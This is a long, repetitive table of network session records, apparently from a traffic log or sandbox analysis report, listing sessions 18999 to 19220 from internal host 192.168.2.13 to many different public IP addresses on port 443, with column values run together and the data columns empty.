                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18999192.168.2.1346878157.64.152.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19000192.168.2.135334063.175.96.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19001192.168.2.13414341.9.189.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19002192.168.2.133408454.12.180.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19003192.168.2.135990054.131.114.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19004192.168.2.134036851.81.217.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19005192.168.2.1356024200.198.0.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19006192.168.2.134223432.66.129.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19007192.168.2.134034613.198.189.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19008192.168.2.1336530203.222.52.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19009192.168.2.1348992177.114.226.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19010192.168.2.1333774170.220.139.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19011192.168.2.1354496163.96.121.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19012192.168.2.1353872137.250.129.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19013192.168.2.134330060.36.158.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19014192.168.2.135635650.179.255.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19015192.168.2.1335936186.50.100.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19016192.168.2.1347332101.110.118.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19017192.168.2.1344520202.2.11.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19018192.168.2.134224473.191.194.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19019192.168.2.134826842.166.67.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19020192.168.2.134786886.161.250.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19021192.168.2.1348302190.138.26.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19022192.168.2.135760435.143.213.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19023192.168.2.133456452.174.163.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19024192.168.2.1339104178.222.236.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19025192.168.2.1355856151.208.183.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19026192.168.2.1355380150.90.106.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19027192.168.2.1359404130.51.34.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19028192.168.2.1351576134.67.132.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19029192.168.2.1346598223.34.209.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19030192.168.2.1360450147.74.147.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19031192.168.2.134256665.178.165.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19032192.168.2.1335164136.220.0.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19033192.168.2.135911694.177.29.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19034192.168.2.1338532131.181.147.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19035192.168.2.1357164175.121.150.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19036192.168.2.1340264161.58.118.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19037192.168.2.135392458.187.9.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19038192.168.2.1335476163.208.159.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19039192.168.2.1333098148.6.233.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19040192.168.2.1354236130.159.174.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19041192.168.2.1348982136.193.216.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19042192.168.2.1335574115.232.222.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19043192.168.2.13511829.47.106.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19044192.168.2.1341842100.16.29.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19045192.168.2.1347256148.56.68.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19046192.168.2.1346750163.232.40.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19047192.168.2.135302646.126.231.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19048192.168.2.1353652126.67.2.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19049192.168.2.1346600217.155.120.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19050192.168.2.1344378171.128.125.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19051192.168.2.134319475.248.243.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19052192.168.2.133293696.127.103.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19053192.168.2.1360650132.115.189.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19054192.168.2.1333400189.50.130.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19055192.168.2.134580668.203.211.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19056192.168.2.134235286.147.137.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19057192.168.2.1342706178.82.47.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19058192.168.2.13576784.244.100.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19059192.168.2.1338984128.203.231.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19060192.168.2.1340574219.247.134.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19061192.168.2.135906674.48.249.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19062192.168.2.1337840204.9.119.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19063192.168.2.135670069.146.113.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19064192.168.2.1344576105.115.64.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19065192.168.2.1342150191.189.201.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19066192.168.2.1346820151.175.56.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19067192.168.2.1336588138.48.61.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19068192.168.2.1356338196.152.123.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19069192.168.2.1341360138.140.159.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19070192.168.2.134343054.170.129.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19071192.168.2.1348780209.182.122.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19072192.168.2.133959014.175.211.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19073192.168.2.1339230209.173.204.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19074192.168.2.135045678.184.67.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19075192.168.2.1343180151.83.3.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19076192.168.2.133797225.0.82.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19077192.168.2.1354324110.57.106.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19078192.168.2.1354058211.132.60.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19079192.168.2.133277075.15.217.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19080192.168.2.134110442.247.211.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19081192.168.2.1341442190.34.174.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19082192.168.2.1355310136.53.135.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19083192.168.2.134279424.77.183.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19084192.168.2.1353114155.30.45.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19085192.168.2.1351540135.136.160.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19086192.168.2.134179693.226.107.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19087192.168.2.1348206206.40.237.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19088192.168.2.134539699.92.150.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19089192.168.2.133882067.115.148.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19090192.168.2.1353840178.79.83.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19091192.168.2.134500642.15.253.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19092192.168.2.134240050.10.156.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19093192.168.2.1351650173.211.10.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19094192.168.2.1351104193.103.48.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19095192.168.2.135901490.235.65.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19096192.168.2.1350184110.127.88.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19097192.168.2.1354370128.211.191.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19098192.168.2.1344166153.81.57.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19099192.168.2.1349756112.50.70.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19100192.168.2.134710687.175.107.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19101192.168.2.13460381.182.167.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19102192.168.2.1333712199.12.69.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19103192.168.2.135105490.164.71.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19104192.168.2.1341116131.9.44.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19105192.168.2.1344854165.232.39.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19106192.168.2.1340226152.160.130.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19107192.168.2.1358702114.31.130.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19108192.168.2.1339892112.114.3.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19109192.168.2.1354710183.49.14.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19110192.168.2.133906493.16.99.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19111192.168.2.133618468.93.112.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19112192.168.2.1357974132.39.49.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19113192.168.2.133711842.59.76.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19114192.168.2.133732641.234.31.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19115192.168.2.135601864.26.102.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19116192.168.2.1341720210.7.212.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19117192.168.2.1346566218.140.81.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19118192.168.2.133608612.73.218.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19119192.168.2.1353992119.117.49.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19120192.168.2.1351954166.131.7.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19121192.168.2.134657014.112.21.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19122192.168.2.1352786179.192.144.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19123192.168.2.1345310171.10.36.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19124192.168.2.133815285.224.164.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19125192.168.2.1348968219.85.169.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19126192.168.2.135886019.129.124.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19127192.168.2.133362269.195.109.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19128192.168.2.1360818196.252.70.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19129192.168.2.1359522223.206.1.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19130192.168.2.1342878101.43.128.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19131192.168.2.1343078195.202.79.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19132192.168.2.133663465.235.28.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19133192.168.2.134843257.121.201.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19134192.168.2.1351288141.136.200.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19135192.168.2.1353216176.159.149.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19136192.168.2.133365495.75.32.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19137192.168.2.134390673.189.120.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19138192.168.2.1344644164.127.130.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19139192.168.2.1360904188.135.86.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19140192.168.2.1342212105.34.83.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19141192.168.2.135376898.16.112.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19142192.168.2.1342604121.198.147.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19143192.168.2.1343742189.252.79.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19144192.168.2.1341064119.76.82.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19145192.168.2.133533247.199.79.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19146192.168.2.134916619.59.255.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19147192.168.2.1336388212.62.23.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19148192.168.2.135547817.141.81.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19149192.168.2.133341048.233.72.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19150192.168.2.134373437.31.77.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19151192.168.2.134904885.132.152.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19152192.168.2.1334214204.61.10.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19153192.168.2.1360168205.235.130.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19154192.168.2.135443436.82.236.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19155192.168.2.1344714202.160.112.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19156192.168.2.1335916157.26.81.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19157192.168.2.1333866132.29.55.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19158192.168.2.1333816105.59.112.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19159192.168.2.134341027.189.202.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19160192.168.2.1346982185.96.212.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19161192.168.2.133735273.168.210.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19162192.168.2.134274435.37.123.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19163192.168.2.1332962163.4.213.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19164192.168.2.1343350157.108.221.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19165192.168.2.1350440131.74.202.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19166192.168.2.1352272205.55.68.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19167192.168.2.135141412.84.195.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19168192.168.2.133938670.224.152.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19169192.168.2.1347112164.108.95.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19170192.168.2.135062268.222.233.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19171192.168.2.133691413.205.93.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19172192.168.2.133929836.62.119.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19173192.168.2.134771898.209.81.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19174192.168.2.1340044100.221.43.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19175192.168.2.1357472192.216.32.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19176192.168.2.135745267.208.126.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19177192.168.2.1349634207.45.145.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19178192.168.2.1336758131.186.25.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19179192.168.2.1355198213.126.108.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19180192.168.2.135292267.109.100.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19181192.168.2.135855884.75.234.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19182192.168.2.13583869.110.95.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19183192.168.2.1355540129.198.229.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19184192.168.2.135460825.170.182.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19185192.168.2.1356276143.28.154.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19186192.168.2.1344016190.19.75.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19187192.168.2.1345964162.171.63.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19188192.168.2.1353288177.255.173.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19189192.168.2.1359966209.239.179.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19190192.168.2.13570748.14.74.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19191192.168.2.1336870161.36.98.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19192192.168.2.135136698.118.3.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19193192.168.2.1342140113.227.116.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19194192.168.2.1348016179.12.5.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19195192.168.2.134231238.230.2.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19196192.168.2.1360700222.13.175.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19197192.168.2.1337172195.115.3.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19198192.168.2.135958693.173.5.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19199192.168.2.1345448176.193.212.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19200192.168.2.1345018204.206.115.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19201192.168.2.1355228129.38.68.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19202192.168.2.135299688.21.153.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19203192.168.2.1338042188.40.63.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19204192.168.2.1343524183.78.3.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19205192.168.2.1355060171.222.74.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19206192.168.2.1354264114.186.228.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19207192.168.2.1343874165.101.236.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19208192.168.2.1347206152.196.162.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19209192.168.2.134151485.167.159.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19210192.168.2.1350240167.18.110.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19211192.168.2.134953280.153.112.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19212192.168.2.135785024.203.209.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19213192.168.2.1357780173.169.38.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19214192.168.2.134774682.146.244.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19215192.168.2.134708624.40.145.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19216192.168.2.135226644.33.150.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19217192.168.2.1335152126.27.241.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19218192.168.2.1350404126.152.183.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19219192.168.2.1353396142.187.195.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19220192.168.2.1339152119.202.42.244443
